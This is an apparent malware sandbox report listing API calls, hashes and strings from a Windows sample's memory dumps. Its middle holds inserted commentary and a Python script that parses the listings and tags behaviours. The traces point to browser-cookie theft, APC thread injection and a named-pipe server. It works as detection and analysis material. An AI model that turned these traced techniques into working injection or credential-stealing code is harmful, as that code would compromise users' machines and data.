  • GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
  • GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
  • OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
  • IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
  • CloseHandle.KERNEL32(00000000), ref: 001D8391
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 294
  • API ID: RegCloseKeyRegEnumKeyExRegOpenKeyExWaitForSingleObject
  • String ID:
  • API String ID: 748258982-0
  • Opcode ID: 7bf492882853c3015655118e3a7311c329205b35a24c50d6a171498e9cb856b8
  • Instruction ID: c4f6a71227964e3593b2b7d6490afeb5c5d07facd6dc22aca2af185f2e6999e2
  • Opcode Fuzzy Hash: 88F0C94503ACC397C42F94822FA2B63E242EF219C8C8CE795BBB47E1F91D6036124627
  • Instruction Fuzzy Hash: c4f6a71227964e3593b2b7d6490afeb5c5d07facd6dc22aca2af185f2e6999e2
APIs
  • RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,?,?,00000000,000000B7,?,?,00000000,?,?,01B37494), ref: 01B34244
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
  • RegEnumKeyExA.KERNEL32(?,?,?,01B37494,00000000,00000000,00000000,00000000,00000104,00000000,?,?,00000000,?,?,01B37494), ref: 01B3428B
  • WaitForSingleObject.KERNEL32(00000000,?), ref: 01B342F8
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
    • Part of subcall function 01B32E04: StrChrA.SHLWAPI(01B37494,0000005F), ref: 01B32E47
    • Part of subcall function 01B32E04: lstrcpy.KERNEL32(?,01B37494), ref: 01B32E5F
    • Part of subcall function 01B32E04: RegOpenKeyA.ADVAPI32(?,?,00000000), ref: 01B32E95
    • Part of subcall function 01B32E04: RegQueryValueExW.KERNEL32(00000000,01B381C0,00000000,?,00000000,01B37494), ref: 01B32EBB
    • Part of subcall function 01B32E04: lstrlenW.KERNEL32 ref: 01B32ECC
    • Part of subcall function 01B32E04: RtlAllocateHeap.NTDLL(00000000,01B374CA), ref: 01B32EE1
    • Part of subcall function 01B32E04: RegQueryValueExW.KERNEL32(00000000,01B381C0,00000000,?,00000000,01B37494), ref: 01B32F06
    • Part of subcall function 01B32E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 01B32F2A
    • Part of subcall function 01B32E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 01B32F3C
    • Part of subcall function 01B32E04: lstrcmpiW.KERNEL32(00000000), ref: 01B32F53
    • Part of subcall function 01B32E04: lstrcpy.KERNEL32(?,01B380FA), ref: 01B32F95
    • Part of subcall function 01B32E04: lstrcpy.KERNEL32(?,?), ref: 01B32FEE
    • Part of subcall function 01B32E04: RegCreateKeyA.ADVAPI32(?,?,?), ref: 01B33002
    • Part of subcall function 01B32E04: RegQueryValueExA.ADVAPI32(?,01B38256,00000000,?,?,01B37494), ref: 01B33025
    • Part of subcall function 01B32E04: RegOpenKeyExA.ADVAPI32(?,?,00000000,01B342EB,?,?,01B34303,0AEBFFFF), ref: 01B33088
    • Part of subcall function 01B32E04: RegOpenKeyW.ADVAPI32(?,00000000,?), ref: 01B330A3
    • Part of subcall function 01B32E04: RegDeleteValueW.ADVAPI32(?,01B37560), ref: 01B330B1
    • Part of subcall function 01B32E04: RegCloseKey.ADVAPI32(?), ref: 01B330BA
    • Part of subcall function 01B32E04: RegCloseKey.ADVAPI32(?), ref: 01B330C3
    • Part of subcall function 01B32E04: HeapFree.KERNEL32(00000000,01B37494,?), ref: 01B330D8
    • Part of subcall function 01B32E04: HeapFree.KERNEL32(00000000,00000000), ref: 01B330FB
    • Part of subcall function 01B32E04: RegCloseKey.ADVAPI32(00000000), ref: 01B3310D
  • RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,00000000,?,?,01B37494), ref: 01B34320
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 385
  • API ID: CloseHandleCreateFileReadFileSetFilePointer
  • String ID:
  • API String ID: 3466452087-0
  • Opcode ID: f05951512fc70493bcc218ada1478013eab1d332df878026975bea813deea018
  • Instruction ID: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
  • Opcode Fuzzy Hash: 32E026401A9D83C9C64754854852F22B264E764646DACF7626718BF232AF263236DF2A
  • Instruction Fuzzy Hash: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
APIs
    • Part of subcall function 01B33C8B: GetModuleFileNameW.KERNEL32(01B37494,00000000,00000104,00000208,01B3618C,0000000C,?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000), ref: 01B33CB1
    • Part of subcall function 01B33C8B: GetModuleFileNameA.KERNEL32(01B37494,00000000,00000104,00000208,01B3618C,0000000C,?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000), ref: 01B33CB9
    • Part of subcall function 01B33C8B: GetLastError.KERNEL32(?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000,?,?,?,01B317BE), ref: 01B33CF7
    • Part of subcall function 01B348FB: lstrcmp.KERNEL32(?,01B37494), ref: 01B349A8
    • Part of subcall function 01B348FB: lstrlen.KERNEL32(?,00000000,00000000,01B31852), ref: 01B349B3
  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 01B333BB
  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,01B31BAF,01B38451), ref: 01B333CD
  • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 01B333E5
  • CloseHandle.KERNEL32(?), ref: 01B33400
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 64
  • API ID: HeapFreeRegCloseKeyRegQueryValueExRtlAllocateHeap
  • String ID:
  • API String ID: 1519508758-0
  • Opcode ID: 2c20f16d7cb35b0837f37e1f163c74e89bf46e78e287d7b3e7984998dc48fbe4
  • Instruction ID: 12fb51b55a7001464f3794808c81bf3cfeac7e12aa544af5f58c252b32687a95
  • Opcode Fuzzy Hash: BFE07DE10F45C256111F7D4A647FA76C310CC440D130C7313BD74596BD0E43301B8709
  • Instruction Fuzzy Hash: 12fb51b55a7001464f3794808c81bf3cfeac7e12aa544af5f58c252b32687a95
APIs
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
  • RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
  • HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
  • RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 129
  • API ID: RegCreateKeyRegOpenKeylstrlen
  • String ID:
  • API String ID: 3913359509-0
  • Opcode ID: 4a10325c95453f6cc476ef8e5a47647315785bf9e091164d0adb2aeafd4fec03
  • Instruction ID: 51caf505ad6b25b9284138eb4f6b6eda7fb90fd966c398a8e598c706edcf3f74
  • Opcode Fuzzy Hash: 9CD0A934820C8ACBC02B88001C6AA2A80A0AB010C2C8C627278C23912B2F9072892EA5
  • Instruction Fuzzy Hash: 51caf505ad6b25b9284138eb4f6b6eda7fb90fd966c398a8e598c706edcf3f74
APIs
  • RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
  • RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
  • lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
    • Part of subcall function 001CBE3C: GetLastError.KERNEL32(000000FF,00000008,?,000000FF,001EB004,?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000), ref: 001CBE7C
    • Part of subcall function 001CBE3C: CloseHandle.KERNEL32(000000FF), ref: 001CBE87
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false

Similar Non-Executed Functions

Similarity
  • Total matches: 59
  • API ID: HeapFree$RtlAllocateHeaplstrcat$CreateDirectoryDeleteFilelstrlenmbstowcs
  • String ID: %APPDATA%$%APPDATA%\Mozilla\Firefox\Profiles$\cookie.ff$\cookie.ie$\sols
  • API String ID: 2820067504-4232923486
  • Opcode ID: 3d14cf29faf766bfeb75039b264b2d7cbadb4797a584a71d88c970bf056bfa6f
  • Instruction ID: 901aeb1831ed6878ca2adce8fbd2872f2b742ef2d46d3f993e52c754e3bb2ff3
  • Opcode Fuzzy Hash: A2118CB00A05034BC02BA862E5AA37F4981BE835C4C4D1763FE05AB12E1F5731E67F0B
  • Instruction Fuzzy Hash: 901aeb1831ed6878ca2adce8fbd2872f2b742ef2d46d3f993e52c754e3bb2ff3
APIs
  • lstrlen.KERNEL32(%APPDATA%), ref: 001C1C68
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
  • RtlAllocateHeap.NTDLL(00000000,?,%APPDATA%\Mozilla\Firefox\Profiles), ref: 001C1CB3
  • mbstowcs.NTDLL ref: 001C1CC6
  • lstrcatW.KERNEL32(00000000,001EC804), ref: 001C1CD5
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C1CF9
  • RtlAllocateHeap.NTDLL(00000000,0000020C), ref: 001C1D0B
  • lstrcatW.KERNEL32(00000000,001E53C0), ref: 001C1D2D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C1D51
    • Part of subcall function 001D6CC6: lstrlen.KERNEL32(?,?,00000000,?,00000000,001C7543,?,?,?,?,?,?,?,?,?,001C1255), ref: 001D6CD5
  • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 001C1D77
    • Part of subcall function 001C1B85: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1BC4
    • Part of subcall function 001C1B85: lstrcpyW.KERNEL32(00000000,001C1DC2), ref: 001C1BD5
    • Part of subcall function 001C1B85: CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1BEC
    • Part of subcall function 001C1B85: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,0000005C,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1C05
    • Part of subcall function 001C1B85: CopyFileW.KERNEL32(?,00000000,00000000), ref: 001C1C34
    • Part of subcall function 001C1B85: HeapFree.KERNEL32(00000000,00000000), ref: 001C1C42
  • DeleteFileW.KERNEL32(?), ref: 001C1DC6
  • HeapFree.KERNEL32(00000000,?), ref: 001C1DD4
  • HeapFree.KERNEL32(00000000,?), ref: 001C1DF0
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: FindFirstFile$FindCloseFindNextFileWaitForSingleObjectmemset
  • String ID:
  • API String ID: 1787114350-0
  • Opcode ID: f51bd5130761bfcbb2dde5f7148bce543a8c4d605f388eb2cd72b1422ad7a0c5
  • Instruction ID: bd781be9b02a429d5c41947a9cf951fafe2009a97a88700872d728148f38a155
  • Opcode Fuzzy Hash: 9831CD22216EB4C3D517A5A94459779F901DF007D6F09FB11E9A2E04CD9DC35AB0FF18
  • Instruction Fuzzy Hash: bd781be9b02a429d5c41947a9cf951fafe2009a97a88700872d728148f38a155
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memset.NTDLL ref: 001D6FCE
  • FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
  • FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
  • FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
  • WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
  • FindClose.KERNEL32(?), ref: 001D71EE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 57
  • API ID: GetComputerNameHeapFreeRtlAllocateHeap
  • String ID: Client
  • API String ID: 3015569430-3236430179
  • Opcode ID: fd148c837d0b481578b7d1bf63dc4b1a0bf1844f652122844ed59ba803be3f2c
  • Instruction ID: f125b15e941851991c1381d3eb23db14bac24dd9311658ae4169dcc9cf04ff7b
  • Opcode Fuzzy Hash: 4AF059624E5981B3403F44DA42A51BE4600F4C31E15CC272BFC14AE2ED8E0770A22F57
  • Instruction Fuzzy Hash: f125b15e941851991c1381d3eb23db14bac24dd9311658ae4169dcc9cf04ff7b
APIs
  • RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE20C
  • HeapFree.KERNEL32(00000000,?), ref: 001DE242
  • GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE250
  • RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE267
  • GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE278
  • HeapFree.KERNEL32(00000000,00000000), ref: 001DE29E
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: CreateToolhelp32SnapshotGetModuleHandleGetProcAddressOpenThreadQueueUserAPCThread32FirstThread32Next
  • String ID:
  • API String ID: 1672352458-0
  • Opcode ID: 1aeb80c38cfc5c0a8cfd58ac1562df29def6d9c7c8df75773877e7a5eae794f0
  • Instruction ID: 2c1285140dd081ac5577a07b8dcb83313de7ecbc8bee00da9e77533937aa6cbe
  • Opcode Fuzzy Hash: D4E02064520567CFC21760B0915371EF90479A5CD5E1C777FF4A428E0B2E0731A7A375
  • Instruction Fuzzy Hash: 2c1285140dd081ac5577a07b8dcb83313de7ecbc8bee00da9e77533937aa6cbe
APIs
  • CreateToolhelp32Snapshot.KERNEL32 ref: 001CB391
  • GetModuleHandleA.KERNEL32(001EC01D,001ED067,00000004,00000000,00000000,00000000,00000001), ref: 001CB3A8
  • GetProcAddress.KERNEL32(00000000), ref: 001CB3AF
  • Thread32First.KERNEL32(001CD6FE,0000001C), ref: 001CB3BF
  • OpenThread.KERNEL32(001F03FF,00000000,00000000,001CD6FE,0000001C), ref: 001CB3DA
  • QueueUserAPC.KERNEL32(?,00000000,00000000), ref: 001CB3EB
  • Thread32Next.KERNEL32(001CD6FE,0000001C), ref: 001CB3FB
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: DeleteFileFindFirstFileFindNextFileGetLastErrorRemoveDirectory
  • String ID:
  • API String ID: 1089496181-0
  • Opcode ID: 404a45bcf307c79ebd751717ed0c922086e74df7a977f6731b91689120b89dc8
  • Instruction ID: 90ed9556279df49a0f93b6e45a9746ece17ae1501ae5ed02bf884558c7615ea3
  • Opcode Fuzzy Hash: 2401CBA3511DC96BEF83A1E06920BCBD444EF01270E8EE379A934204C54F00798B3B8F
  • Instruction Fuzzy Hash: 90ed9556279df49a0f93b6e45a9746ece17ae1501ae5ed02bf884558c7615ea3
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • FindFirstFileW.KERNEL32(?,00000000), ref: 001D7327
  • RemoveDirectoryW.KERNEL32(?), ref: 001D73A1
  • DeleteFileW.KERNEL32(?), ref: 001D73AC
  • FindNextFileW.KERNEL32(?,00000000), ref: 001D73BF
  • GetLastError.KERNEL32 ref: 001D73DA
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 120
  • API ID: GetLastError$CloseHandleCreateNamedPipeCreateThread
  • String ID:
  • API String ID: 1313248766-0
  • Opcode ID: 30add2293a1c4e7698607cd224a2cd89a7530f0af40c3b4cc732cba0ae1be137
  • Instruction ID: 4148eaee69a31b6fb3cd0b83f2f9e5c8e854a768ff6cb781906392e167196464
  • Opcode Fuzzy Hash: C6D0A7B057080ACAC517A130847936FABD5EFC51C1E8D0776F780B106F6B9731EA989E
  • Instruction Fuzzy Hash: 4148eaee69a31b6fb3cd0b83f2f9e5c8e854a768ff6cb781906392e167196464
APIs
  • CreateNamedPipeA.KERNEL32(40000003,00000004,000000FF,00000100,00000100,00000000,001EB0D8,079007F4), ref: 001CBED5
  • CreateThread.KERNEL32(00000000,00000000,001CBB92,00000000,00000000,?), ref: 001CBEEF
  • GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CBF00
  • CloseHandle.KERNEL32(00000000), ref: 001CBF09
  • GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CBF11
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
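The three entries above are read most usefully as behaviours rather than as call lists: the function at 001CB391 walks every thread in a snapshot and calls QueueUserAPC on each one it can open (the classic APC-injection loop), the function at 001C3C05 opens a key under the hive handle 80000001, and the function at 001CBED5 stands up a named-pipe server on its own thread. The Python below is an added example, not part of the Joe Sandbox report or its tooling: it parses the report's "APIs" listing shape, collapses A/W suffixes the same way the report's own "API ID" field does, tags each function against a small rule set, and decodes two logged constants (the predefined hive handles, and the 001F03FF access mask passed to OpenThread). The rule names, the tag strings and the hive table are this example's own choices; the sample input is copied verbatim from the three entries above.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional, Set

# Constructed sample input: the "APIs" listings copied from three of the report's
# function entries (APC injection loop, HKCU registry lookup, named-pipe server).
SAMPLE = """\
APIs
  • CreateToolhelp32Snapshot.KERNEL32 ref: 001CB391
  • GetModuleHandleA.KERNEL32(001EC01D,001ED067,00000004,00000000,00000000,00000000,00000001), ref: 001CB3A8
  • GetProcAddress.KERNEL32(00000000), ref: 001CB3AF
  • Thread32First.KERNEL32(001CD6FE,0000001C), ref: 001CB3BF
  • OpenThread.KERNEL32(001F03FF,00000000,00000000,001CD6FE,0000001C), ref: 001CB3DA
  • QueueUserAPC.KERNEL32(?,00000000,00000000), ref: 001CB3EB
  • Thread32Next.KERNEL32(001CD6FE,0000001C), ref: 001CB3FB
APIs
  • RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
  • RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
  • lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
    • Part of subcall function 001CBE3C: GetLastError.KERNEL32(000000FF,00000008,?,000000FF,001EB004,?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000), ref: 001CBE7C
    • Part of subcall function 001CBE3C: CloseHandle.KERNEL32(000000FF), ref: 001CBE87
APIs
  • CreateNamedPipeA.KERNEL32(40000003,00000004,000000FF,00000100,00000100,00000000,001EB0D8,079007F4), ref: 001CBED5
  • CreateThread.KERNEL32(00000000,00000000,001CBB92,00000000,00000000,?), ref: 001CBEEF
  • GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CBF00
  • CloseHandle.KERNEL32(00000000), ref: 001CBF09
"""

# One bullet line: optional "Part of subcall function <addr>: ", API.MODULE, optional
# "(args)", then the call-site address. Lines such as "memset.NTDLL ref: ..." have no args.
CALL_RE = re.compile(
    r"^\s*[•*-]\s*(?:Part of subcall function (?P<sub>[0-9A-F]+): )?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<mod>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-F]+)\s*$"
)


@dataclass
class Call:
    api: str
    module: str
    args: List[str]
    ref: str                # address of the call site
    subcall: Optional[str]  # callee address when the call happens inside a sub-function


@dataclass
class Function:
    calls: List[Call] = field(default_factory=list)

    def direct_apis(self) -> Set[str]:
        """APIs the function calls itself, with A/W variants collapsed."""
        return {normalize(c.api) for c in self.calls if c.subcall is None}


def normalize(api: str) -> str:
    """Collapse ANSI/Unicode variants the way the report's "API ID" field does
    (RegOpenKeyA -> RegOpenKey); names such as QueueUserAPC are left untouched."""
    if len(api) > 2 and api[-1] in "AW" and api[-2].islower():
        return api[:-1]
    return api


def parse_api_listings(text: str) -> List[Function]:
    """Split the text on "APIs" headers and parse every bullet under each one."""
    funcs: List[Function] = []
    for line in text.splitlines():
        if line.strip() == "APIs":
            funcs.append(Function())
            continue
        m = CALL_RE.match(line)
        if m is None or not funcs:
            continue
        raw = m.group("args")
        args = [a.strip() for a in raw.split(",")] if raw else []
        funcs[-1].calls.append(Call(m.group("api"), m.group("mod"), args, m.group("ref"), m.group("sub")))
    return funcs


# Behaviour rules (this example's own): every listed API must be a direct call.
RULES = {
    "thread-enumeration APC injection": {
        "CreateToolhelp32Snapshot", "Thread32First", "Thread32Next", "OpenThread", "QueueUserAPC"},
    "named-pipe server": {"CreateNamedPipe", "CreateThread"},
}

# Predefined registry hive handles (winreg.h).
HIVES = {0x80000000: "HKEY_CLASSES_ROOT", 0x80000001: "HKEY_CURRENT_USER",
         0x80000002: "HKEY_LOCAL_MACHINE", 0x80000003: "HKEY_USERS"}
# THREAD_ALL_ACCESS as defined for Windows XP/2003; Vista and later define 0x1FFFFF,
# so a hard-coded 0x1F03FF usually means the code was built against the older SDK.
THREAD_ALL_ACCESS_XP = 0x1F03FF


def hex_arg(call: Call, index: int) -> Optional[int]:
    """Arguments are logged as hex; '?' means the sandbox could not recover the value."""
    try:
        return int(call.args[index], 16)
    except (IndexError, ValueError):
        return None


def decode_constants(func: Function) -> List[str]:
    notes: Set[str] = set()
    for c in func.calls:
        if c.subcall is not None:
            continue
        name, first = normalize(c.api), hex_arg(c, 0)
        if name in ("RegOpenKey", "RegCreateKey", "RegOpenKeyEx", "RegCreateKeyEx") and first in HIVES:
            notes.add(f"registry:{HIVES[first]}")
        elif name == "OpenThread" and first == THREAD_ALL_ACCESS_XP:
            notes.add("OpenThread:THREAD_ALL_ACCESS(XP)")
    return sorted(notes)


def tag_function(func: Function) -> List[str]:
    apis = func.direct_apis()
    tags = [name for name, needed in RULES.items() if needed <= apis]
    return tags + decode_constants(func)


if __name__ == "__main__":
    for i, f in enumerate(parse_api_listings(SAMPLE)):
        print(f"function {i} (first call at {f.calls[0].ref}): {tag_function(f) or ['no tag']}")
```

Two details carry the analytic weight. Subcall bullets are kept but excluded from rule matching, because a rule built on indirect calls would fire on every caller of a shared helper (the HeapFree/RegCloseKey helpers in this report are reached from dozens of functions). And the access mask on OpenThread is decoded rather than ignored: 001F03FF is THREAD_ALL_ACCESS as the pre-Vista SDK defined it, which is consistent with the sample targeting older Windows as well as the Windows 7 analysis host.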
Similarity
  • Total matches: 86
  • API ID: HeapFreeNtUnmapViewOfSectionRtlNtStatusToDosError
  • String ID:
  • API String ID: 3330954857-0
  • Opcode ID: 02a61448e217c9ef6f534c07a9fd427649efd77a8a877fb27eb9f5184da74e11
  • Instruction ID: 0644c66e21c54e57ba80f44bb6735bfe181557861a3a7a617ae7e4636646a487
  • Opcode Fuzzy Hash: 1CC02BB0481582C3B53F0CA2008E126ED45BAD32E0A0E1025E0083404CF5A3C7FCBF49
  • Instruction Fuzzy Hash: 0644c66e21c54e57ba80f44bb6735bfe181557861a3a7a617ae7e4636646a487
APIs
  • NtUnmapViewOfSection.NTDLL(079007F4), ref: 001CDCCE
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 001CDCD5
  • HeapFree.KERNEL32(00000000,00000000,079007F4), ref: 001CDCE4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 52
  • API ID: HeapFreeRtlAllocateHeaplstrlen$StrChrmemcpy$lstrcpynmemmove
  • String ID: GET $GET $OPTI$OPTI$POST$PUT
  • API String ID: 2276190360-647159250
  • Opcode ID: 54d3a76867c680fbcbb72380afb113d398c97eb44d4465c367e7f7ee21a8a799
  • Instruction ID: b8b73962650da9c8cbf1578ec52c8a5265e5485c2cc85bc05aa2a259874b6926
  • Opcode Fuzzy Hash: 1F41DB301A4E81C7D933309200B7BFAD045FF93694C8DA356CA0165B6F6F826227BB4E
  • Instruction Fuzzy Hash: b8b73962650da9c8cbf1578ec52c8a5265e5485c2cc85bc05aa2a259874b6926
APIs
  • lstrlen.KERNEL32(001ECCEF,00000000,?,?), ref: 001CCB9E
    • Part of subcall function 001C7E94: memset.NTDLL ref: 001C7ED0
    • Part of subcall function 001C7E94: HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
    • Part of subcall function 001C7E94: memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001CCC38
  • lstrcpyn.KERNEL32(00000000,?,?), ref: 001CCC4D
    • Part of subcall function 001CB4E6: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001CB4F1
    • Part of subcall function 001CB4E6: Sleep.KERNEL32(0000000A,?,?,001CCC60,00000000), ref: 001CB4FB
    • Part of subcall function 001CB4E6: SetEvent.KERNEL32(?,?,001CCC60), ref: 001CB552
    • Part of subcall function 001CB4E6: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001CB588
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001CCC69
    • Part of subcall function 001C7D61: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C7DC3
    • Part of subcall function 001C7D61: memcpy.NTDLL(00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DE9
    • Part of subcall function 001C7D61: memcpy.NTDLL(00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DF8
    • Part of subcall function 001C7D61: memcpy.NTDLL(?,?,?,00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7E0A
  • HeapFree.KERNEL32(00000000,?), ref: 001CCE32
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CBFA1
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CBFD9
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CC048
  • StrChrA.SHLWAPI(?,00000020), ref: 001CCD44
  • StrChrA.SHLWAPI(00000001,00000020), ref: 001CCD55
